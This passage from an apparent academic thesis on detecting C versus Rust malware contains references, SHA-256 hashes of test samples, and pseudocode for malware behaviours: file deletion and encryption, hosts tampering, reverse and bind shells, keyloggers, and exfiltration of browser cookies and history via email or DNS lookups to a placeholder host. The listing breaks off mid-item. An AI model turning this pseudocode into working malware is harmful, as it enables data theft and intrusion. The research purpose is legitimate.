[29] Fortinet, “What is Malware Analysis?” https://www.fortinet.com/resources/cyberglossary/malware-
analysis (accessed Apr. 27, 2023).
[30] D. Vidyarthi, C. Kumar, S. Rakshit, and S. Chansarkar, “Static malware analysis to identify ransomware
properties,” International Journal of Computer Science Issues (IJCSI), vol. 16, no. 3, pp. 10–17, 2019.
[31] N. Aggarwal, P. Aggarwal, and R. Gupta, “Static malware analysis using pe header files api,” in 2022
6th International Conference on Computing Methodologies and Communication (ICCMC), IEEE, 2022,
pp. 159–162.
[32] Infosec Resources, “Static Malware Analysis.” https://resources.infosecinstitute.com/topic/malware-
analysis-basics-static-analysis/ (accessed Mar. 25, 2023).
[33] K. Baker, “Malware Analysis,” Apr. 17, 2023.
https://www.crowdstrike.com/cybersecurity-101/malware/malware-analysis/ (accessed Apr. 20, 2023).
[34] C. Willems, T. Holz, and F. Freiling, “Toward automated dynamic malware analysis using cwsandbox,”
IEEE Security & Privacy, vol. 5, no. 2, pp. 32–39, 2007.
[35] T. Shibahara, T. Yagi, M. Akiyama, D. Chiba, and T. Yada, “Efficient dynamic malware analysis based
on network behavior using deep learning,” in 2016 IEEE Global Communications Conference
(GLOBECOM), IEEE, 2016, pp. 1–7.
[36] A. Afianian, S. Niksefat, B. Sadeghiyan, and D. Baptiste, “Malware dynamic analysis evasion
techniques: A survey,” ACM Computing Surveys (CSUR), vol. 52, no. 6, pp. 1–28, 2019.
[37] L. Zeltser, “Reverse engineering malware,” Retrieved June, vol. 13, p. 2010, 2001.
[38] S. Megira, A. Pangesti, and F. Wibowo, “Malware analysis and detection using reverse engineering
technique,” in Journal of Physics: Conference Series, IOP Publishing, 2018, p. 012042.
[39] Hex Rays, “IDA Free.” Accessed: Feb. 22, 2023. [Online]. Available: https://hex-rays.com/ida-free/
[40] Hex Rays, “IDA Pro.” Accessed: Feb. 22, 2023. [Online]. Available: https://hex-rays.com/ida-pro/
[41] O. Yuschuk, “OllyDbg.” https://www.ollydbg.de/ (accessed Feb. 20, 2023).
[42] National Security Agency, “Ghidra.” Accessed: Feb. 22, 2023. [Online]. Available: https://ghidra-
sre.org/
[43] The Rust Programming Language, “The rustc book.” https://doc.rust-lang.org/rustc/what-is-rustc.html
(accessed Apr. 25, 2023).
[44] C. Lattner and V. Adve, “The LLVM Compiler Framework and Infrastructure Tutorial,” in International
Workshop on Languages and Compilers for Parallel Computing, Springer, 2004, pp. 15–16.
[45] C. Lattner and V. Adve, “LLVM: A compilation framework for lifelong program analysis &
transformation,” in International Symposium on Code Generation and Optimization, 2004. CGO 2004.,
IEEE, 2004, pp. 75–86.
[46] M. Woerister, “Incremental Compilation.” https://blog.rust-lang.org/2016/09/08/incremental.html
(accessed Apr. 25, 2023).
[47] The Rust Programming Language, “The rustup book.” https://rust-lang.github.io/rustup/cross-
compilation.html (accessed Apr. 25, 2023).
[48] Mingw.org, “MinGW-w64.” Accessed: Feb. 22, 2023. [Online]. Available: https://www.mingw-w64.org/
[49] T. Rothwell and J. Youngman, “The GNU C Reference Manual,” Free Software Foundation, Inc, p. 86,
2007.

[50] R. M. Stallman, “GNU Compiler Collection Internals,” Free Software Foundation, 2002.
[51] Microsoft, “MSVC.” Accessed: Feb. 22, 2023. [Online]. Available:
https://learn.microsoft.com/en-us/cpp/build/reference/compiler-options?view=msvc-170
[52] Microsoft, “Visual Studio IDE.” Accessed: Feb. 22, 2023. [Online]. Available:
https://visualstudio.microsoft.com/vs/features/cplusplus/
[53] Y. Xiao and M. Watson, “Guidance on conducting a systematic literature review,” Journal of planning
education and research, vol. 39, no. 1, pp. 93–112, 2019.
[54] ImmunityInc, “Immunity Debugger.” https://www.immunityinc.com/products/debugger/ (accessed Feb.
22, 2023).
[55] Palo Alto, “BlackCat Ransomware,” 2021. https://unit42.paloaltonetworks.com/atoms/blackcat-
ransomware/ (accessed Nov. 02, 2023).
[56] Microsoft Security, “The many lives of BlackCat ransomware.” Accessed: Aug. 10, 2022. [Online].
Available: https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-
ransomware/
[57] H. Aver, “BlackCat — new player in the ransomware business,” 2022. Accessed: Aug. 10, 2022.
[Online]. Available: https://me-en.kaspersky.com/blog/black-cat-ransomware/19541/
[58] Kaspersky, “A Bad Luck BlackCat,” 2022. Accessed: Dec. 02, 2023. [Online]. Available:
https://securelist.com/a-bad-luck-blackcat/106254/
[59] Kaspersky, “New ransomware: A cross-platform future,” 2022. Accessed: Apr. 25, 2023. [Online].
Available: https://me-en.kaspersky.com/blog/luna-blackbasta-ransomware/19860/
[60] M. Rivero, J. V. Wiel, D. Galov, and S. Lozhkin, “Luna and Black Basta - New ransomware for
Windows, Linux and ESXi,” 2022. Accessed: Apr. 25, 2023. [Online]. Available:
https://securelist.com/luna-black-basta-ransomware/106950/
[61] BlackBerry, “Luca Stealer Targets Password Managers and Cryptocurrency Wallets,” 2022. Accessed:
Aug. 10, 2022. [Online]. Available: https://blogs.blackberry.com/en/2022/08/luca-stealer-targets-
password-managers-and-cryptocurrency-wallets
[62] TrendMicro, “New Nokoyawa Ransomware Possibly Related to Hive,” 2022. Accessed: Apr. 25, 2023.
[Online]. Available: https://www.trendmicro.com/en_us/research/22/c/nokoyawa-ransomware-possibly-
related-to-hive-.html
[63] ZScaler, “Nokoyawa Ransomware: Rust or Bust,” 2022. Accessed: Apr. 25, 2023. [Online]. Available:
https://www.zscaler.com/blogs/security-research/nokoyawa-ransomware-rust-or-bust
[64] IBM Security X-Force, “RansomExx Upgrades to Rust,” 2022. Accessed: Apr. 01, 2023. [Online].
Available: https://securityintelligence.com/posts/ransomexx-upgrades-rust/
[65] TrendMicro, “Agenda Ransomware Uses Rust to Target More Vital Industries,” 2022. Accessed: Mar.
03, 2023. [Online]. Available: https://www.trendmicro.com/en_us/research/22/l/agenda-ransomware-
uses-rust-to-target-more-vital-industries.html
[66] McAfee, “BinText.” Accessed: Mar. 03, 2022. [Online]. Available:
http://b2b-download.mcafee.com/products/tools/foundstone/bintext303
[67] HIEW, “Hiew.” Accessed: Feb. 22, 2023. [Online]. Available: https://hiew.ru
[68] Jamf Threat Labs, “BlueNoroff APT group targets macOS with ‘RustBucket’ Malware,” 2023.
Accessed: Apr. 26, 2023. [Online]. Available: https://www.jamf.com/blog/bluenoroff-apt-targets-macos-
rustbucket-malware/
[69] M. Kiely, “The Crown: Exploratory Analysis of Nim Malware - DC615/DEF CON Nashville.”
https://github.com/HuskyHacks/the-crown-defcon615 (accessed Oct. 01, 2022).
[70] M. Kiely, “HuskyHacks, The Crown: Exploratory Analysis of Nim Malware - DC615/DEF CON
Nashville,” Jan. 2022. Accessed: Oct. 01, 2022. [Online]. Available:
https://www.youtube.com/watch?v=mCWzEh8gJuk
[71] B. Kurtz, “DEF CON 29 - Ben Kurtz - Offensive Golang Bonanza: Writing Golang Malware,” Aug.
2021. Accessed: Oct. 02, 2022. [Online]. Available: https://www.youtube.com/watch?v=3RQb05ITSyk
[72] C. Seese and S. McMurray, “BSides DC 2019 - Hands-on Writing Malware in Go,” Oct. 2019.
Accessed: Oct. 02, 2022. [Online]. Available: https://www.youtube.com/watch?v=2cGsTEkDkT8
[73] A. Adhikari and P. A. Kulkarni, “Using the Strings Metadata to Detect the Source Language of the
Binary,” in Proceedings of the ICR’22 International Conference on Innovations in Computing Research,
K. Daimi and A. Al Sadoon, Eds., Cham: Springer International Publishing, 2022, pp. 190–200.

[74] S. Akabane and T. Okamoto, “Identification of toolchains used to build IoT malware with statically
linked libraries,” Procedia Computer Science, vol. 192, pp. 5130–5138, 2021.
[75] A. Küchler and C. Banse, “Representing LLVM-IR in a Code Property Graph,” in International
Conference on Information Security, Springer, 2022, pp. 360–380.
[76] T. Tamboli, T. H. Austin, and M. Stamp, “Metamorphic code generation from LLVM bytecode,” Journal
of Computer Virology and Hacking Techniques, vol. 10, no. 3, pp. 177–187, 2014.
[77] T. E. Dube, B. D. Birrer, R. A. Raines, R. O. Baldwin, B. E. Mullins, R. W. Bennington, and C. E.
Reuter, “Hindering reverse engineering: Thinking outside the box,” IEEE Security & Privacy, vol. 6, no.
2, pp. 58–65, 2008.
[78] S. Bhansali, A. Aris, A. Acar, H. Oz, and A. S. Uluagac, “A First Look at Code Obfuscation for
WebAssembly,” in Proceedings of the 15th ACM Conference on Security and Privacy in Wireless and
Mobile Networks, 2022, pp. 140–145.
[79] Ytisf, “TheZoo - A Live Malware Repository.” https://github.com/ytisf/theZoo (accessed Aug. 04, 2022).
[80] VXUnderground, “Malware Source Code.” https://github.com/vxunderground/MalwareSourceCode
(accessed Aug. 04, 2022).
[81] MITRE, “ATT&CK.” https://attack.mitre.org/ (accessed Apr. 25, 2023).
[82] B. J. Kwon, J. Mondal, J. Jang, L. Bilge, and T. Dumitraş, “The dropper effect: Insights into malware
distribution with downloader graph analytics,” in Proceedings of the 22nd ACM SIGSAC Conference on
Computer and Communications Security, 2015, pp. 1118–1129.
[83] U. Bayer, I. Habibi, D. Balzarotti, E. Kirda, and C. Kruegel, “A View on Current Malware Behaviors,”
in LEET, 2009.
[84] P. O’Kane, S. Sezer, and D. Carlin, “Evolution of ransomware,” IET Networks, vol. 7, no. 5, pp. 321–327,
2018.
[85] Z. Akhtar, “Malware detection and analysis: Challenges and research opportunities,” arXiv preprint
arXiv:2101.08429, 2021.
[86] G. Palavicini, “Bridging the detection gap: a study on a behavior-based approach using malware
techniques,” 2014.
[87] S. Kuraku and D. Kalla, “Emotet malware—a banking credentials stealer,” Iosr J. Comput. Eng, vol. 22,
pp. 31–41, 2020.
[88] G. Wangen, “The role of malware in reported cyber espionage: a review of the impact and mechanism,”
Information, vol. 6, no. 2, pp. 183–211, 2015.
[89] A. R. A. Grégio, D. S. Fernandes, V. M. Afonso, P. L. de Geus, V. F. Martins, and M. Jino, “An empirical
analysis of malicious internet banking software behavior,” in Proceedings of the 28th Annual ACM
Symposium on Applied Computing, 2013, pp. 1830–1835.
[90] P.-M. Bureau and C. Dietrich, “Hiding in Plain Sight.” Black Hat, 2015.
[91] W. Mazurczyk and L. Caviglione, “Information hiding as a challenge for malware detection,” arXiv
preprint arXiv:1504.04867, 2015.
[92] S. Sheridan and A. Keane, “Improving the stealthiness of dns-based covert communication,” in
European Conference on Cyber Warfare and Security, Academic Conferences International Limited,
2017, pp. 433–441.
[93] U. Bayer, C. Kruegel, and E. Kirda, TTAnalyze: A tool for analyzing malware. na, 2006.
[94] A. Tajoddin and M. Abadi, “RAMD: registry-based anomaly malware detection using one-class
ensemble classifiers,” Applied Intelligence, vol. 49, pp. 2641–2658, 2019.
[95] K. Oosthoek and C. Doerr, “Sok: Att&ck techniques and trends in windows malware,” in Security and
Privacy in Communication Networks: 15th EAI International Conference, SecureComm 2019, Orlando,
FL, USA, October 23-25, 2019, Proceedings, Part I 15, Springer, 2019, pp. 406–425.
[96] S. Sagiroglu and G. Canbek, “Keyloggers: Increasing threats to computer security and privacy,” IEEE
technology and society magazine, vol. 28, no. 3, pp. 10–17, 2009.
[97] Y. A. Ahmed, M. A. Maarof, F. M. Hassan, and M. M. Abshir, “Survey of Keylogger technologies,”
International journal of computer science and telecommunications, vol. 5, no. 2, 2014.
[98] A. Bhardwaj and S. Goundar, “Keyloggers: silent cyber security weapons,” Network Security, vol. 2020,
no. 2, pp. 14–19, 2020.
[99] Remnux.org, “REMNux: A Linux Toolkit for Malware Analysts.” Accessed: Feb. 22, 2023. [Online].
Available: https://remnux.org

[100] VirusTotal, “About us.” https://support.virustotal.com/hc/en-us/categories/360000160117-About-us
(accessed Dec. 01, 2022).
[101] VirusTotal, “Contributors.” https://support.virustotal.com/hc/en-us/articles/115002146809-Contributors
(accessed Dec. 01, 2022).
[102] VirusTotal, “Att&CK techniques.” https://developers.virustotal.com/reference/attack_techniques-5
(accessed Apr. 25, 2023).
[103] G. P. Spathoulas and S. K. Katsikas, “Reducing false positives in intrusion detection systems,”
computers & security, vol. 29, no. 1, pp. 35–44, 2010.
[104] P. Vinod, R. Jaipur, V. Laxmi, and M. Gaur, “Survey on malware detection methods,” in Proceedings of
the 3rd Hackers’ Workshop on computer and internet security (IITKHACK’09), 2009, pp. 74–79.
[105] The Rust Programming Language, “Crate std.” https://doc.rust-lang.org/std/ (accessed Apr. 20, 2023).
[106] The Rust Programming Language, “The Rust runtime.” https://doc.rust-lang.org/reference/runtime.html
(accessed Apr. 20, 2023).
[107] The Rust Programming Language, “Module Thread,” Apr. 20, 2023. https://doc.rust-lang.org/std/thread/
(accessed Apr. 25, 2023).
[108] The Rust Programming Language, “Fearless Concurrency,” Apr. 20, 2023.
https://doc.rust-lang.org/book/ch16-00-concurrency.html (accessed Apr. 25, 2023).
[109] The Rust Programming Language, “Crate syscalls,” Apr. 20, 2023. https://docs.rs/syscalls/latest/syscalls/
(accessed Apr. 25, 2023).
[110] Users Forum of the Rust Programming Language, “Size of the executable binary file of an application.”
https://users.rust-lang.org/t/size-of-the-executable-binary-file-of-an-application/62160 (accessed Apr. 20,
2023).
[111] The Rust Programming Language, “Linkage: The Rust Reference.”
https://doc.rust-lang.org/reference/linkage.html (accessed Apr. 21, 2023).
[112] The Rust Programming Language, “Inlining.” https://nnethercote.github.io/perf-book/inlining.html
(accessed Apr. 21, 2023).
[113] The Rust Programming Language, “Code generation attributes.”
https://doc.rust-lang.org/nightly/reference/attributes/codegen.html?highlight=inline (accessed Apr. 21,
2023).
[114] The Rust Programming Language, “Crate unroll.” https://docs.rs/unroll/latest/unroll/ (accessed Apr. 21,
2023).
[115] H. Jin, “A Loop Flattening Pass in LLVM,” Dec. 20, 2020.
https://www.cs.cornell.edu/courses/cs6120/2020fa/blog/loop-flatten/ (accessed Apr. 21, 2023).
[116] The Rust Programming Language, “Optimizations: The speed size tradeoff.” https://docs.rust-
embedded.org/book/unsorted/speed-vs-size.html (accessed Apr. 23, 2023).
[117] “Cargo Profiles.” https://doc.rust-lang.org/cargo/reference/profiles.html (accessed Apr. 23, 2023).
[118] The Rust Programming Language, “Customizing Builds with Release Profiles.” https://doc.rust-
lang.org/book/ch14-01-release-profiles.html (accessed Apr. 23, 2023).
[119] Z. Dmitry, “GitHub: Source file names are included into a release binary even if abort upon panic is
enabled,” Aug. 07, 2020. https://github.com/rust-lang/rust/issues/75263 (accessed Apr. 23, 2023).
[120] Mzji, “GitHub: Enable remap-path-prefix for absolute paths by default,” Mar. 15, 2017.
https://github.com/rust-lang/rust/issues/40552 (accessed Apr. 23, 2023).
[121] Trickster0, “OffensiveRust.” https://github.com/trickster0/OffensiveRust (accessed Apr. 24, 2023).
[122] The Rust Programming Language, “Crate mangling.” https://docs.rs/mangling/latest/mangling/
(accessed Apr. 22, 2023).
[123] Users Forum of the Rust Programming Language, “Why Rust has name mangling.” https://internals.rust-
lang.org/t/why-rust-has-name-mangling/12503/1 (accessed Apr. 22, 2023).
[124] Ghidra, “Interface SymbolTable.”
https://ghidra.re/ghidra_docs/api/ghidra/program/model/symbol/SymbolTable.html (accessed Apr. 20,
2023).
[125] D. Lukan, “The basics of IDA pro,” May 11, 2018. https://resources.infosecinstitute.com/topic/basics-of-
ida-pro-2/ (accessed Apr. 20, 2023).
[126] The Rust Programming Language, “Exceptions.”
https://doc.rust-lang.org/beta/embedded-book/start/exceptions.html (accessed Apr. 18, 2023).

[127] The Rust Programming Language, “Error Handling.” https://doc.rust-lang.org/book/ch09-00-error-
handling.html (accessed Apr. 19, 2023).
[128] The Rust Programming Language, “Macro std::panic.” https://doc.rust-lang.org/std/macro.panic.html
(accessed Apr. 19, 2023).
[129] M. Al-Asli and T. A. Ghaleb, “Review of Signature-based Techniques in Antivirus Products,” in 2019
International Conference on Computer and Information Sciences (ICCIS), 2019, pp. 1–6. doi:
10.1109/ICCISci.2019.8716381.
[130] J. Scott, “Signature based malware detection is dead,” Institute for Critical Infrastructure Technology,
2017.
[131] G. Canfora, A. Di Sorbo, F. Mercaldo, and C. A. Visaggio, “Obfuscation techniques against signature-
based detection: a case study,” in 2015 Mobile systems technologies workshop (MST), IEEE, 2015, pp.
21–26.
[132] P. O’Kane, S. Sezer, and K. McLaughlin, “Obfuscation: The hidden malware,” IEEE Security &
Privacy, vol. 9, no. 5, pp. 41–47, 2011.
[133] T. Muralidharan, A. Cohen, N. Gerson, and N. Nissim, “File Packing from the Malware Perspective:
Techniques, Analysis Approaches, and Directions for Enhancements,” ACM Computing Surveys, vol. 55,
no. 5, pp. 1–45, 2022.
[134] W. Yan, Z. Zhang, and N. Ansari, “Revealing packed malware,” IEEE Security & Privacy, vol. 6, no. 5,
pp. 65–69, 2008.
[135] A. A. Elhadi, M. A. Maarof, and A. H. Osman, “Malware detection based on hybrid signature behaviour
application programming interface call graph,” American Journal of Applied Sciences, vol. 9, no. 3, p.
283, 2012.
[136] A. K. Chakravarty, A. Raj, S. Paul, and S. Apoorva, “A study of signature-based and behaviour-based
malware detection approaches,” Int. J. Adv. Res. Ideas Innov. Technol., vol. 5, no. 3, pp. 1509–1511,
2019.
[137] MITRE ATT&CK, “Obfuscated Files or Information.” https://attack.mitre.org/techniques/T1027/
(accessed Mar. 03, 2023).
[138] MITRE ATT&CK, “Impair Defenses: Disable or Modify Tools.”
https://attack.mitre.org/techniques/T1562/001/ (accessed Mar. 03, 2023).
[139] Ö. Aslan and R. Samet, “Investigation of possibilities to detect malware using existing tools,” in 2017
IEEE/ACS 14th International Conference on Computer Systems and Applications (AICCSA), IEEE,
2017, pp. 1277–1284.
[140] Y. Prayudi, I. Riadi, and others, “Implementation of malware analysis using static and dynamic analysis
method,” International Journal of Computer Applications, vol. 117, no. 6, 2015.
[141] Zer0x64, “GitHub: Rust language analysis.”
https://github.com/NationalSecurityAgency/ghidra/issues/141 (accessed Jan. 30, 2023).
[142] M. Ehrnschwender, “Digging through Rust to find Gold: Extracting Secrets from Rust Malware,” Aug.
23, 2022. https://www.binarydefense.com/resources/blog/digging-through-rust-to-find-gold-extracting-
secrets-from-rust-malware/ (accessed Apr. 03, 2023).
[143] T. Messner, “Bite Sized Rust RE: 1 Deconstructing Hello World,” May 19, 2020.
https://rayoflightz.github.io/about/ (accessed Apr. 03, 2023).
[144] D. Maroo, “GhidRust.” Accessed: Apr. 27, 2023. [Online]. Available:
https://github.com/DMaroo/GhidRust
[145] BinaryDefense, “Ghidra Rust Dependencies Extractor.” Accessed: Apr. 26, 2023. [Online]. Available:
https://github.com/BinaryDefense/GhidraRustDependenciesExtractor
[146] J. Grigg, “Demangle Rust.” Accessed: Apr. 28, 2023. [Online]. Available:
https://gist.github.com/str4d/e541f4c28e2bca80d222434ac1a204f4

Appendix A
Signatures of the Sub-categories of Malware Tested

The SHA-256 hashes of the sub-categories of malware samples developed for Experiment 1
and Experiment 2 are provided in this table. These malware signatures are now in
VirusTotal’s database, and the results can be viewed using the hash strings.

Sub-category of Malware: Delete files
  C Programming Language:    8e2d94b0ffb46efe790f0ab4fd9a197d92c59391b40f5781fef696bffa2710f7
  Rust Programming Language: bb32836fae329ce8ac0f21bb119069d706dd0f84060234cf6369661b1e3a8dd1

Sub-category of Malware: Encrypt files
  C Programming Language:    297359bfe3769cdecf7fa5250a1ef942162b1a2ef2fad10d64fab7a6f4e051be
  Rust Programming Language: 8f06ecb38fd99833d662c1284b5682ce47213cdcbccc188452d2d38e984b6654

Sub-category of Malware: Create files
  C Programming Language:    35c5df8905208af21f14df3aca052fb38f904ac0ca36426e6ac3124f8e77d7a6
  Rust Programming Language: 2fef4c438254e829cd5d5003a07b1689344081d272db3454a37a1a154816866f

Sub-category of Malware: Modify file
  C Programming Language:    8cd1cfea6aa8482d6c00ed93b0a17f06984572c45b98266a4ef3c3dd87650800
  Rust Programming Language: d5c02513079e89803437d4158fc4e775930765db3f9b33e5a0ce9ab101a471ac

Sub-category of Malware: Simple reverse shell
  C Programming Language:    797d9a916f2cf9efde4aeb19c9554b37568115b52854bc4fb9fe9f1996523734
  Rust Programming Language: c6831d1d8bc153d8b9d803dff58be18ae6a306ddfc93da790c71fc5832352ba8

Sub-category of Malware: Simple bind shell
  C Programming Language:    f6141fda3df6c7a5567a272ad25d46f862ea396f52fc0562d81ce2494b4e6bbe
  Rust Programming Language: 3c729243893e9b7ca22ac1fc13b4a733f22632b2b70d083677cad581638f3929

Sub-category of Malware: Obfuscated reverse shell
  C Programming Language:    32f6ae89e042e5ad8deb60393e67e598ac6f2fe5e45d4f18a8984717f02470d7
  Rust Programming Language: dd13f2f6c8e217b983fff9be0186e1c415a867117c6adc6adff7cc0d5567ef65

Sub-category of Malware: Obfuscated bind shell
  C Programming Language:    4e6f1865486697baed8bc7171d1e4590e3c1c346fe0e8aeb779caa69149edaf6
  Rust Programming Language: 99dba94fe13c0d3dd428fc2037bd292fb37f00f228d022e73cb79f9a9e27a0cb

Sub-category of Malware: Hosts file exfiltration using email
  C Programming Language:    507392754fb29055da428a53be4b70ade203337888acd6e2ca34299fd1b4a41c
  Rust Programming Language: 290fe161bc5c9d47e38ea9c2dedeef0ec59af6e2db9155a8b2ca20a78d855362

Sub-category of Malware: Edge browser history exfiltration using email
  C Programming Language:    15f60982c16f9a40d45807f274662a9d8d02bde28f135ffcbcc92a69e2ba2cb3
  Rust Programming Language: bf15c753af46456352974a8da8e231052ae34082d839d393f4e13b9d4dab1038

Sub-category of Malware: Edge browser cookies exfiltration using email
  C Programming Language:    773db0eb2dd9a069c1b3f78be12da7ff9fc6950feb9bc4c067ee85163f742dcf
  Rust Programming Language: 7ab209384282e3b709f11c71e498655e0fd0fe238b1c2d96cbb418b64fae4549

Sub-category of Malware: Hosts file exfiltration using DNS
  C Programming Language:    a18a2841c0f55cedcc77714bd3fc263d7dc37cc635f82b2c855c5a2818b09cc2
  Rust Programming Language: 5de1cf951adb309d2fa1e92d83c2fffad9db8a747f030062a563b41f7fcf8f33

Sub-category of Malware: Edge browser history exfiltration using DNS
  C Programming Language:    581ae21f62786e254bf872cf2700246277fb5c7d004da9f9fdc1b0e2df2dee5a
  Rust Programming Language: 619becefb6f9d18cd5365291a37b651418cbe29dd2e223941ff82961916b7c84

Sub-category of Malware: Edge browser cookies exfiltration using DNS
  C Programming Language:    375ddd79e135a6d7194ef8079df081c2fcfd2dfa8ff8bf8179afc49125fc847b
  Rust Programming Language: b9023b2353ce3db94e14e851e455c0288da5a7ef3f66ade9a8a0682a54e97a4d

Sub-category of Malware: Delete registry key
  C Programming Language:    baf594d1e312b2586ef0d5b6354ccb5bcaa77e0f65ccb343cc4ebe1fe2190d4d
  Rust Programming Language: 79cf104693316ee3026fe69bfb2d4a8f9128b31e0139282fbee1876bdd31d566

Sub-category of Malware: Modify registry key
  C Programming Language:    800853b756bb08c66be7f42804e9e5a65b13c4e8536c9f40f269669ae574a634
  Rust Programming Language: 014031bf0c001b4225175656d278170e81c8181f9d41801b72ba796f73587be1

Sub-category of Malware: Add registry key
  C Programming Language:    2f0bb800e99439536f854ca38b1dd101b8245df5d704b1e08bd112adbe08a44b
  Rust Programming Language: 26a0045d6559ea73a499a48411459eba21737913a0ee15a206a359d0803f9566

Sub-category of Malware: Simple keylogger
  C Programming Language:    42bde7b776a2ace1ae4dfa8fb0b91fba50b473ed739d25c0a54429f5a96d0908
  Rust Programming Language: 74b6ddcacc0efe791fd7b8f28304cd2c90bd7f83bb189a6c090418a8eb541d2e

Sub-category of Malware: Keylogger that sends file with data via DNS
  C Programming Language:    2f192f6057738da3b4c39053b0b28d4eccf874e1c63cb6eb58304a71cee6ec40
  Rust Programming Language: dfdaf2594afb64ffd30480105721348b26c52fe885b79f43d1b09f01a2e7e331

Sub-category of Malware: Keylogger that sends file with data via email
  C Programming Language:    b71d83e533304f2124e044ca6038ed3328f40e2b803fedfeeaf3982a69934ecb
  Rust Programming Language: 958753df3cb662f17dde2760f7ea594eee824f556061dd2df1febdbe08090c45

Appendix B
Pseudocode of the Sub-categories of Malware Tested

1. Delete files
FUNCTION main
SET folder_path
INITIALIZE file_handle

file_handle:= call winapi_findfile(folder_path)


if file_handle == INVALID_HANDLE_VALUE
print “Unable to open directory”
exit
do
call winapi_deletefile(folder_path)
while call winapi_findnextfile(folder_path) !=0

CALL winapi_closefile(file_handle)
return

2. Encrypt files
DECLARE key

FUNCTION encrypt_file (file_path)


SET file = open(file_path)
if file == NULL
print “Unable to open file”
content:= read_file_contents (file)
buffer:= content XOR key
write_file_contents(file, buffer)

FUNCTION main
SET folder_path
INITIALIZE file_handle

file_handle:= call winapi_findfile(folder_path)


if file_handle == INVALID_HANDLE_VALUE
print “Unable to open directory”
exit

do
call winapi_deletefile(folder_path)
while call winapi_findnextfile(folder_path) !=0

CALL encrypt_file(file_handle)

CALL winapi_closefile(file_handle)
return

3. Create file
FUNCTION main
SET file_path
INITIALIZE file_handle
SET file_name:= “secret.txt”

file_handle:= call winapi_findfile(folder_path)


if file_handle == INVALID_HANDLE_VALUE
print “Unable to open directory”
exit

call winapi_createfile(file_path)
SET file = open(file_path)
if file == NULL
print “Unable to open file”
buffer:= “S3cr3t”
write_file_contents(file, buffer)

CALL winapi_closefile(file_handle)
return

4. Modify file
FUNCTION main
SET file_path:= "C:\\Windows\\System32\\drivers\\etc\\hosts"

SET file = open(file_path)


if file == NULL
print “Unable to open file”
write_file_contents(file, “127.0.0.1 google.com”)
CALL winapi_closefile(file)
return

5. Simple reverse shell
FUNCTION main
SET startup_info
SET process_info
SET socket_address
SET socket
SET ip_address
SET port

INITIALIZE winsock
CALL winapi create_socket
CALL winapi connect_socket
CALL winapi createprocess ("cmd.exe")

6. Obfuscated reverse shell


DECLARE key

FUNCTION obfuscate(string)
return string XOR key

FUNCTION main
SET startup_info
SET process_info
SET socket_address
SET socket
SET ip_address:= call obfuscate(ip_address)
SET port

INITIALIZE winsock
CALL winapi create_socket
CALL winapi connect_socket
CALL winapi createprocess ( call obfuscate ("cmd.exe"))
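
The obfuscate helper in this listing is given only as "string XOR key". As a minimal sketch of that one operation, assuming a repeating multi-byte key (the pseudocode does not say how the key is sized or applied), the Rust function below shows that XOR is its own inverse, so the same routine both masks and restores a byte string. The name xor_with_key, the key "k3y" and the input "hello" are hypothetical and are not taken from the thesis samples.

```rust
/// XOR every byte of `data` with a repeating `key`.
/// Hypothetical helper for illustration; not the thesis implementation.
fn xor_with_key(data: &[u8], key: &[u8]) -> Vec<u8> {
    assert!(!key.is_empty(), "key must not be empty");
    data.iter()
        .zip(key.iter().cycle()) // repeat the key as often as needed
        .map(|(byte, k)| byte ^ k)
        .collect()
}

fn main() {
    let key = b"k3y"; // assumed key, for illustration only
    let plain = b"hello";

    // Applying the function once masks the bytes.
    let masked = xor_with_key(plain, key);
    assert_ne!(&masked[..], &plain[..]);

    // Applying it again with the same key restores the input.
    let restored = xor_with_key(&masked, key);
    assert_eq!(&restored[..], &plain[..]);

    println!("round trip ok");
}
```

Because the transformation is symmetric, a single function can serve for both directions, which is consistent with the listing declaring only one obfuscate function.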

7. Simple bind shell


FUNCTION shell (socket)
SET buffer:= 1024
SET nbytes
SET startup_info
SET process_info

while true
allocate memory for buffer
nbytes := read_socket(buffer)

if nbytes <=0
print “Connection closed by client”
break

if buffer = “exit”
print “Closing connection”
break

CALL winapi createprocess ("cmd.exe")

FUNCTION main
INITIALIZE winsock
SET socket_address
SET socket
SET client

CALL create_socket()
CALL bind_socket(socket)
CALL listen_socket(socket)

while true
client_socket:= call accept_connections(client)
CALL shell(client_socket)

8. Obfuscated bind shell


DECLARE key

FUNCTION obfuscate(string)
return string XOR key

FUNCTION shell (socket)


SET buffer:= 1024
SET nbytes
SET startup_info
SET process_info

while true
allocate memory for buffer
nbytes := read_socket(buffer)

if nbytes <=0
print “Connection closed by client”
break

if buffer = “exit”
print “Closing connection”
break

CALL winapi createprocess ( call obfuscate ("cmd.exe"))

FUNCTION main
INITIALIZE winsock
SET socket_address:= obfuscate(socket_address)
SET socket
SET client

CALL create_socket()
CALL bind_socket(socket)
CALL listen_socket(socket)

while true
client_socket:= call accept_connections(client)
CALL shell(client_socket)

9. Hosts file exfiltration using email


FUNCTION main
SET file_path := "C:\\Windows\\System32\\drivers\\etc\\hosts"
SET contents := read file_path
SET email := construct email

INITIALIZE SMTP_transport
Send SMTP commands

10. Edge browser history exfiltration using email


FUNCTION main
SET local_app_dir := env("%LOCALAPPDATA%")
SET file_path := local_app_dir + "\\Microsoft Edge\\User Data\\Default\\History"
SET contents := read file_path
SET email := construct email

INITIALIZE SMTP_transport
Send SMTP commands

11. Edge browser cookies exfiltration using email
FUNCTION main
SET local_app_dir := env("%LOCALAPPDATA%")
SET file_path := local_app_dir + "\\Microsoft Edge\\User Data\\Default\\Cookies"
SET contents := read file_path
SET email := construct email

INITIALIZE SMTP_transport
Send SMTP commands

12. Hosts file exfiltration using DNS


FUNCTION main
set file_path := "C:\\Windows\\System32\\drivers\\etc\\hosts"
set contents := read file_path
set chunks := split contents

for chunk in chunks do


set encoded := base64_encode(chunk)
CALL system ( nslookup "{encoded}.{hostname}" )

13. Edge browser history exfiltration using DNS


FUNCTION main
set local_app_dir := env("%LOCALAPPDATA%")
set file_path := local_app_dir + "\\Microsoft Edge\\User Data\\Default\\History"
set contents := read file_path
set chunks := split contents

for chunk in chunks do


set encoded := base64_encode(chunk)
CALL system ( nslookup "{encoded}.{hostname}" )

14. Edge browser cookies exfiltration using DNS


FUNCTION main
set local_app_dir := env("%LOCALAPPDATA%")
set file_path := local_app_dir + "\\Microsoft Edge\\User Data\\Default\\Cookies"
set contents := read file_path
set chunks := split contents

for chunk in chunks do


set encoded := base64_encode(chunk)

CALL system ( nslookup "{encoded}.{hostname}" )

15. Delete registry key


FUNCTION main
INITIALIZE hkey
SET autorun_path = "Software\\Microsoft\\Windows\\CurrentVersion\\Run"
SET rogue_value = 0

